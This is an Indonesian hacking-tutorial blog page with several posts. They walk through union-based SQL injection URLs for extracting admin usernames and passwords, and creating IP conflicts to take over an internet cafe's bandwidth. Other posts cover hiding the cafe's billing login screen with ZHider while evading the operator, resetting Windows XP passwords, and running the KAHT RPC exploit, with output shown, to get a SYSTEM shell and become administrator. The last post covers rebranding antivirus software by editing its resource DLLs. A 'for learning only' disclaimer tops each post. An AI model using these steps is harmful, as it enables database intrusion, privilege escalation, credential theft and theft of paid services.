  2. Dari hasil perintah tadi kemudian Anda akan diminta untuk memasukkan password baru dan tekan Enter. Kemudian, Anda diminta memasukkan password sekali lagi dan tekan Enter. Namun ingat, ketiklah password dengan teliti karena password tersebut tidak akan ditampilkan oleh command prompt.

Kini semuanya telah selesai, Anda telah berhasil mengganti atau mereset password user lain pada Windows XP.

Read more

Blind SQL Injection Methode

PERHATIAN !!! ARTIKEL INI HANYA UNTUK PEMBELAJARAN DAN MENAMBAH ILMU. PENULIS TIDAK BERTANGGUNG JAWAB TERHADAP SEMUA AKIBAT DARI TULISAN INI YANG DISALAH GUNAKAN

============                                                                                                                                                                      =step one=                                                                                                                                                                         ============

Find the target
ex: /news.php?pid=1

Add character ‘ at end of url to find error message.
ex: /news.php?pid=1′ atau

===========
=step two=
===========

find and count to amount the table in database.
use the command : order by

es: [site]/news.php?pid=-1+order+by+1–

chek step by step…
misal: /news.php?pid=-1+order+by+1–
/news.php?pid=-1+order+by+2–
/news.php?pid=-1+order+by+3–
/news.php?pid=-1+order+by+4–

so it appears error message or missing error…
ex: /news.php?pid=-1+order+by+5–

so that we take is up to number 4
ex: /news.php?pid=-1+order+by+4–

============
=step three=
============

for show the numbers that appear use the union
coz it error until 5
do this: /news.php?pid=-1+union+select+1,2,3,4–

=============
=step four:=
=============

find the tabble
you can use your logic
example the table is
admin, admins, login, logins, user, users

use command +from+(table_name)–

ok do this
ex : /news.php?pid=-1+union+select+1,2,3,4+from+admin–
if not have error

and you can see the number is appear for example 2
go to the next step

============
=step five=
============

find the username & peassword coloumn
for username
use ur logic again
example:
user, usr, username, user_name, login, user_admin, name, admin_user, and etc

last number 2 is appear
do this
ex : /news.php?pid=-1+union+select+1,username,3,4+from+admin–

example appear : admin
admin is username

for password
use ur logic again
example:
password, pswd, passwd, pass, pwd, kunci, masuk, sandi, and etc

ex : /news.php?pid=-1+union+select+1,password,3,4+from+admin–

example appear : 123456
123456 is password

===============
=step six:=
===============

ok in the last step you must find admin page

ex : website.com/admin

sorry bhs inggris hehehehe..

=====================

Read more

Warnet Bandwidth mu oh !!!

PERHATIAN !!! ARTIKEL INI HANYA UNTUK PEMBELAJARAN DAN MENAMBAH ILMU. PENULIS TIDAK BERTANGGUNG JAWAB TERHADAP SEMUA AKIBAT DARI TULISAN INI YANG DISALAH GUNAKAN

Seringkah anda ke warnet? ketika mau download file yang cukup besar tapi bandwidth yang didapat lemot habis….  (maklum karena bandwidthnya di share.) kebayang gak jika satu warnet komputernya 20 unit plus operator 1 unit  jika masing2 komputer mendapat jatah bandwidth 128 kb berarti warnet tsb harus punya total bandwidth 2 Gb apa iya warnet sewa bandwidth sampai sebesar itu??? he he he …. trus gimana nih caranya biar bisa menguasai bandwidth tanpa di share ke banyak komputer? jawabannya bentrokkan aja IP nya.

langkah-langkahnya:

1. Buka my network place atau jika di icon tray terdapat icon dua komputer yang berkedip-kedip klik saja

2. Klik Properties

tcp ip

3. Double klik Internet Protocol (TCP/IP)

tcp ip1

 

Kesimpulkan dari gambar di atas :
[1] IP Address yang dipergunakan adalah IP Address static
[2] IP Address yang terlihat adalah IP Adress untuk komputer yang sedang anda pergunakan
[3] Gateway yang terlihat kemungkinan adalah alamat Proxy, bisa juga alamat Router
Dari info di atas sekarang kita gunakan logika

IP 192.168.139.7 kemungkinan besar adalah IP untuk komputer ke 7 jika di warnet tersebut mengoperasikan 20 komputer dan plus 1 komputer untuk billing berarti konfigurasi IP nya adalah 192.168.139.1 – 192.168.139.21 dan kemungkinan besar IP billing adalah yang terkecil 192.168.139.1 atau malah yang terbesar 192.168.139.21. ok langkah selanjutnya

4. bentrokkan IP nya klik tombol Advanced

tcp ip2 

5. klik tombol add dibawah IP Addresses

tcp ip3

6. Isi IP Address nya dengan 192.168.139.2 dan subnet mask nya dengan 255.255.255.0 (subnet mask tidak boleh dibentrokkan karena akan mematikan koneksi internet anda)

7. klik tombol add  jika sudah ulangi lagi langkah ke 5 dan isi dengan IP 192.168.139.3, ups jangan terlalu bernafsu jika anda tidak ingin operator warnet curiga jangan semua IP di bentrokkin dan jangan juga IP yang anda gunakan di bentrokkin itu sama saja d*d*l   he he

nah selamat deh sekarang anda memiliki bandwidth yang kencang….

Read more

Bermain Warnet Gratis

PERHATIAN !!! ARTIKEL INI HANYA UNTUK PEMBELAJARAN DAN MENAMBAH ILMU. PENULIS TIDAK BERTANGGUNG JAWAB TERHADAP SEMUA AKIBAT DARI TULISAN INI YANG DISALAH GUNAKAN

Berinternet ria di warnet secara murah meriah!! Caranya gampaang! Kalian cuman perlu download Zhider di sini. Untuk selanjutnyaa, aku bakal ngejelasin dulu tentang sistem billing di warnet. UNTITLED-1

 

 

 

 

 

 

 

 

 

 

 

Kalian pasti pernah kan ke warnet?? Naah, kalau pernah pasti kalian sering melihat tampilan halaman login di komputer yg kalian pake di warnet. Itu sebetulnya saat muncul layar login, komputer dah bisa dipake buat browsing. Cuman keganggu ajah sama layar login yg mengharuskan kita untuk mengisi layar login tersebut sehingga kitapun kudu bayar. Nah, dengan menggunakan ZHider, kita bisa menyembunyikan layar login dengan mudaah! Caranya bener2 sederhanaa!

Berikut ini langkahnya:

  1. Pastikan warnet yg kamu pilih masih banyak bilik/kamar yg kosong. Soalnya klo rame ntar operator curiga kenapa masih ada bilik yg kosong?
  2. Baiknya sih kamu pilih bilik yg paling jauh dari operator warnet biar gak ketauan bilik kamu kosong atau ngga.
  3. Nyalakan komputer di depan kamu klo masih dalam keadaan mati.
  4. Klo ada login screen, kamu login ajah seperti biasa.
  5. Jalanin ZHider yg udah kamu download di sini, klo bisa dari rumah dimasukin aja ke flashdisk atau disket biar gak usah download di warnet.
  6. Klo ZHider dah dibuka, langsung ajah logout.
  7. Ntar pasti muncul login screen, kamu pencet CTRL+ALT+Z
  8. Dan login screennya menghilaang! Kamu bisa browsing sepuas-puasnya sampai matiiii! MERDEKAAAAA!!!!!!!
  9. Klo dah puas, kamu pencet CTRL+ALT+X untuk menampilkan kembali login screen yg udah kita sembunyikan tadi.
  10. Login seperti biasaa, kamu browsing2 dulu beberapa menit sampai penunjuk waktunya di atas 5 menit. Tujuannya biar operator warnet gak curiga.
  11. Logout, pasang muka babyface seolah-olah tanpa dosa, dan bayar tarif!
  12. DONNNNEEEEEEEEE!!!!! OYEAAAAAHH!!

Ini khusus untuk warnet yg punya operator yg gak kenal kamu, atau operatornya sering tidur, atau operator yg bisanya cuman nerima pembayaran aja

Dan berikut ini beberapa hotkeys yg ada di ZHider. Untuk lebih lengkapnya baca ajah readme filenya:
CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.

Saya kasih tips dan trik bukan berarti saya mau kalian internetan gratis di warnet sembarangan. Ini cuman buat kalian yg depresi, stres, sampai2 pengen bunuh diri karena saking pengennya online tapi dompet tipis. Lagian saya  juga cuman pengen share aja kok! Gak ada maksud apa2! Hehehehe…

Nah, Okeh! Selamat Mencobaaa…! Saya gak nanggung klo kalian ketauan!

Read more

Tekhnik Exploit Password WinXP

PERHATIAN !!! ARTIKEL INI HANYA UNTUK PEMBELAJARAN DAN MENAMBAH ILMU. PENULIS TIDAK BERTANGGUNG JAWAB TERHADAP SEMUA AKIBAT DARI TULISAN INI YANG DISALAH GUNAKAN

Kali ini saya akan mencoba untuk menjelaskan 2 teknik exploitasi pada windows XP, pertama melakukan pemanfaatan SAM files dan terakhir memanfaatkan RPC-nya Windows XP  Apa akibatnya jika kita menggunakan kedua tekhnik diatas?, Jawab sendiri deh

Tekhnik pertama :
Yang kita butuhkan sekarang adalah :
Petter Recovery Password yang bisa di download dari situsnya langsung  http://pogostick.net/~pnh/ntpasswd/  sekalian sama infonya aja, biasanya sudah di sediakan dalam bentuk rar yang bisa di jadikan bootdisk. Yang penulis pakai untuk experimen kali ini yaitu versi bd080526 terdapat 3 file di dalamnya yakni bd080526.bin , install.bat , rawrite2.exe .
1 buah disket kosong dan layak pakai. –> untuk disket boot Petter Recovery Password.
Nekatzzzz ….

Kasusnya begini, misalnya ….anggap saja kita lupa password untuk login winXP nya. : ) atau kasus yang laen aja kali ya, yang lebih menantang … hehehe. Misalnya ada rampok yang kebingungan gak bisa login, padahal kompienya mo dijual … he he he he. Ada yang kesindir nggak nih ??? Udah ah bercanda mulu. Langsung aja  …

Langkah pertama … Setelah Petter Recovery Password di jadikan bootdisk, langsung saja booting dengan disket tersebut …
Langkah berikutnya, anda akan di tanya di drive mana SAM file berada. Tekan enter saja untuk defaultnya, setelah itu akan ditanyakan secara spesifik lagi, di direktori mana file SAM berada, biasanya untuk yang defaultnya tuh SAM file berada di /windows/system32/config, enter lagi aja untuk yang defaultnya. Setelah itu ……. Nah sampe disini anda akan di minta User mana yang ingin di ganti/hapus passwordnya. Lebih baik Administrators aja, karena yang kita lakukan saat ini kan mencari cara untuk menjadi SU di Windows XP. Biar gampang melakukan sesuatu nantinya …. he he he he !!! Untuk eksperimen kali ini lebih baik anda membuat password Administrators menjadi blankpassword [* = blankpassword], supaya gampang nantinya, dan blankpassword merupakan pilihan terbaik dalam menggunakan Petter Password Recovery. Soalnya penulis sendiri telah belasan kali mencoba mengganti password para user tetapi hanya 2 yang berhasil. Sudah ??? … siiiip, tekan ! untuk mengakhir sesi reset password, dan quit untuk mengakhiri scripts tersebut. Selanjutnya anda akan di tanya kembali, ingin mengulang atau tidak. Lebih baik tidak lahhhh … Edit Completed. Catatan : Setelah menggunakan Petter Recovery Password, Windows berusaha untuk melakukan scandisk, system nya baru di acak-acak nie : ). Tunggu hingga proses scandisk selesai.
Setelah proses booting, anda akan di hadapkan dengan tampilan login yang seperti biasanya. ( Nggak menarik, ) Sekarang tekan ctrl+alt+del, tunggu sebentar dan kemudian tekan kembali ctrl+alt+del. Nah ada tampilan login yang clasic, seperti di windows 98 dulu. Dengan 2 textbox…

————————————————
| Log On to Windows                         | x |
————————————————
| User Name : Al-k                              |
| Password : ******                             |
|                                               |
| | Ok | | Cancel | | BLABLABLABLA….|         |
————————————————

Ya, bentuknya kira-kira seperti diatas … : )

Setelah itu ganti user name nya menjadi Administrator, passwordnya di kosongkan saja, karena sebelumnya kita telah menjadikan blankpassword pada Administrator. Ok. Jreng-jreng-jreng… sekarang anda menjadi super user kembali. Silahkan buat account untuk anda sendiri.

password_popup

Tekhnik Kedua :
Tiba saatnya kita maju bersama … , memanfaatkan Massive RPC WinXP yang bobrok. Tekhnik kedua ini dibuat untuk para user yang memiliki acces limited. Yang dibuat kesal oleh sang admin, sehingga untuk menginstall suatu software harus minta izin dari sang Admin.  . Yang dibutuhkan hanyalah acces untuk masuk ke command shell, dan satu tool kecil ‘kaht’ . Siap ???… buka command promptnya …

C:Documents and SettingsAl-k>net user

User accounts for \NOMATTER ------------------------------------------------------------------------------- Administrator Al-k GNU-- keluarga -- Guest HelpAssistant SUPPORT_388945a0 VUSR_NOMATTER The command completed successfully.

// Anggap saja disini Al-k adalah user yang limited// Setelah itu masuk ke direktori di mana kaht berada

D:Data+ku_>


Kemudian kita test dulu kaht-nya… bisa nggak nih kita nge-root.



  D:Data+ku_>kaht 127.0.0.0 127.0.0.3_________________________________________________

KAHT II - MASSIVE RPC EXPLOIT DCOM RPC exploit. Modified by aT4r@3wdesign.es #haxorcitos && #localhost @Efnet Ownz you!!! FULL VERSION? - AUTOHACKING ________________________________________________

[+] Targets: 127.0.0.0-127.0.0.3 with 50 Threads [+] Attacking Port: 135. Remote Shell at port: 34522 [+] Scan In Progress... - Connecting to 127.0.0.2

Sending Exploit to a [WinXP] Server... - Conectando con la Shell Remota...

Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>

Tuh kan dapet deh akses rootnya. Jangan seneng dulu. Langsung aja kita buat akses user yang terbatas tadi menjadi Super User.



C:WINDOWSsystem32> net localgroup Administrators Al-k /add

The command completed successfully.



Selanjutnya anda bisa login dengan user yang baru saja dirubah accountnya tadi. Dan anda bisa login ke account user lain yang memiliki akses sama seperti Administrator, tentunya dengan menghilangkan password user tersebut dulu sebelumnya. Dan anda bisa masuk ke regedit untuk menutup perizinan user account pada control panel :



HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/DisallowCpl/         buat string baru dengan nama 1 dan ubah valuenya menjadi nusrmgr.cpl

Dan bisa anda disable akses ke command prompt kepada semua user. Sehingga anda menjadi SU yang benar-benar otoriter.

Read more

Hijacking Program / Software

PERHATIAN !!! ARTIKEL INI HANYA UNTUK PEMBELAJARAN DAN MENAMBAH ILMU. PENULIS TIDAK BERTANGGUNG JAWAB TERHADAP SEMUA AKIBAT DARI TULISAN INI YANG DISALAH GUNAKAN

Hijack…apaan tuh? sebenarnya banyak artinya, bukan hanya diartikan sebagai pembajakan tapi pembajakan banget…belum ngerti juga…???  gini nih…kalau bajak software kan hanya membajak softwarenya aja…tinggal minjem CD orang yang ber-isi master software tersebut, kemudian mengcopy dan menginstall di komputer kita. Kalau Hijacking tidak sampai disitu aja… kita dapat mengganti splash screen, nama antivirus itu dan nama copyright atau pembuat atau vendor dari antivirus tersebut. caranya…?? simak aja cerita di bawah ini. PE.Explorer-logo

 

 

 

 

 

 

 

 

 

 

 

 

Kali ini kita akan meng-hijack antivirus luar ya .. kali ini contohnya Norman Antivirus. Sebelumnya yang harus dipersiapkan adalah:

1. PE Explorer, ini adalah sebuah tools yang digunakan untuk mereverse engineering sebuah software, yaitu membongkar isi sebuah software. Bukan hanya membongkar tapi dapat mengganti atau mengedit gambar, tulisan atau label yang ada di software tersebut
2. Process Explorer untuk melihat program ini memakai file dependensi (.dll) agar kita dapat menghijack softwarenya
3.  Master  Norman Anti Virus (boleh bajakan, boleh yang asli)
4. Atau software lain

Okay sekarang kita mulai peng-hijack-an inih…

1. Install Software Norman Antivirus.
2. Kemudian Restart Komputer Anda agar lebih keren
3. Nah setelah restart jalankan process explorer
4. Kemudian jalankan salah satu program dari Norman AV tersebut, misalnya Configuration Editor, Task Editor atau Utilities.
5. Lalu Jalankan process explorer untuk melihat dll apa saja yang dipakai si Antivirus ini untuk menjalankan programnya. Alasannya kenapa file dll yang harus dilihat? Karena dll tersebut adalah sebuah file yang berisi komponen-komponen seperti gambar, icon, tulisan, form dan lain – lain yang digunakan oleh AV untuk menjalankan programnya. let’s check the process explorer

6. Disini kita bisa melihat beberapa aplikasi yang kita jalankan dari Norman AV yaitu : Nvccf.exe, Nvcte.exe dan Nvcut.exe
7. Untuk melihat dll nya klik salah satu program yang disebutkan diatas tadi, misalnya Nvccf.exe:

8. Kemudian lihat kotak bagian bawah untuk meneliti file dll apa aja yang dipakai oleh proses Nvcff.exe, kelihatan kan…kemudian coba catat:

Ada Nvccf0q.dll, Nvccf0p.dll, Nvccf0o.dll, dan lain – lain…

9. Kemudian klik proses lainnya yaitu Nvcte.exe dan Nvcut.exe untuk mengetahui dll yang dipakai, kemudian catat.

10. Dari 3 program tersebut kita dapat melihat dll yang sama dan dipakai oleh ketiga program tersebut adalah user32.dll, shell32.dll, ole32.dll, oleaut32.dll, Noemrc.dll, Niphk.dll

11. Mari kita lakukan penelitian lagi untuk melihat dll apa saja yang akan kita hijack

12. Kita mulai dari user32.dll…umh kayaknya bukan deh … soalnya user32.dll itu file dll yang digunakan windows, okay … lewat, shell32.dll juga, ole32.dll, oleaut32.dll juga merupakan komponen dll dari windows…lewat semua, yang tersisa sekarang Noemrc.dll dan Niphk.dll.

13. Sekarang kita buka PE Explorer, kemudian cari file Niphk.dll berada, yaitu di %direktori dimana Norman ter-install%\Nvc\bin\

14. Kemudian kemudian tekan tombol Ctrl+R untuk melihat resource-nya

15. Di kotak sebelah kiri anda dapat melihat hanya ada komponen version aja… umh…kayaknya bukan deh…oke lanjut ke dll selanjutnya yaitu Noemrc.dll

16. Buka file Noemrc.dll tersebut memakai PE Explorer, kemudian tekan Ctrl+R seperti tadi, kemudian lihat kotak sebelah kiri

17. Ada beberapa komponen yaitu, bitmap, Icon Entry, String dan Group Icon.

18. Klik yang ada di Bitmap

19. Umh… ada 3 sub komponen gambar, mari kita lihat…BINGGO!!!ketemu…ketiga gambar tersebut adalah bitmap yang dipakai untuk menjalankan aplikasi Norman AV.

20. Anda bisa lihat gambar di atas ini adalah yang dipakai oleh aplikasi norman. Coba aja lihat di aplikasi Norman AV yang ada:

21. Nah sekarang untuk menghijack Norman AV ini cukup buat gambar 3 buah, harus berekstensi jpg semua.

22. Kemudian buka file Noemrc.dll dan tekan Ctrl+R

23. Kemudian Klik salah satu komponen dari sub bitmap yang mempunyai caption 101, ganti gambarnya dengan gambar atau logo yang anda buat yaitu dengan menekan tombol Shift+Ctrl+E

24. Kemudian tekan Ctrl+O untuk mencari gambar baru yang digunakan untuk mengganti logo Norman AV.

25. Lakukan langkah seperti di atas untuk sub bitmap 102 dan 103.

26. Setelah itu simpan Noemrc.dll di direktori dimana Norman AV terinstall, misalnya Norman Av terinstall di C:\Norman, maka simpan Noemrc.dll yang baru di direktori C:\Norman\Bin\ dan di C:\Norman\Nvc\Bin\

27. Setelah itu jalankan Norman AV lagi.

28. Lihat perbedaan yang terjadi.

29. Jelas bukan logo, gambar yang berdiri di samping kanan diganti sama gambar kita

30. Untuk lebih jelas anda bisa me-restart komputer dan melihat splash screen yang ada …

PE

Nah itulah sekelumit tentang hijacking program atau software. Jadi untuk membajak jangan tanggung – tanggung, sekalian aja diganti semuanya…enak kan… mengakui software yang bukan buatan kita dengan mengatasnamakan program buatan sendiri sungguh mengasyikan bukan (KALAU TIDAK TAU MALU) … yah mo gimana,…sama seperti beberapa program freeware yang anda buat…sakitt banget kan kalau program tersebut diakui sebagai program buatan orang lain…bukan program buatan kita…SUDAH FREEWARE DI BAJAK PULA…HAHAHAHAHAHHA…yah…moga2 ilmu ini bermanfaat… ok, terakhir semoga kita BUKAN termasuk orang – orang seperti ini, Bukan PEMBAJAK lagi namanya tapi PEMBAJAK BUANGET…. Mau gitu??

Read more

Delete this element to display blogger navbar

Daftar Isi

 
© 2010 Solution is proudly powered by Blogger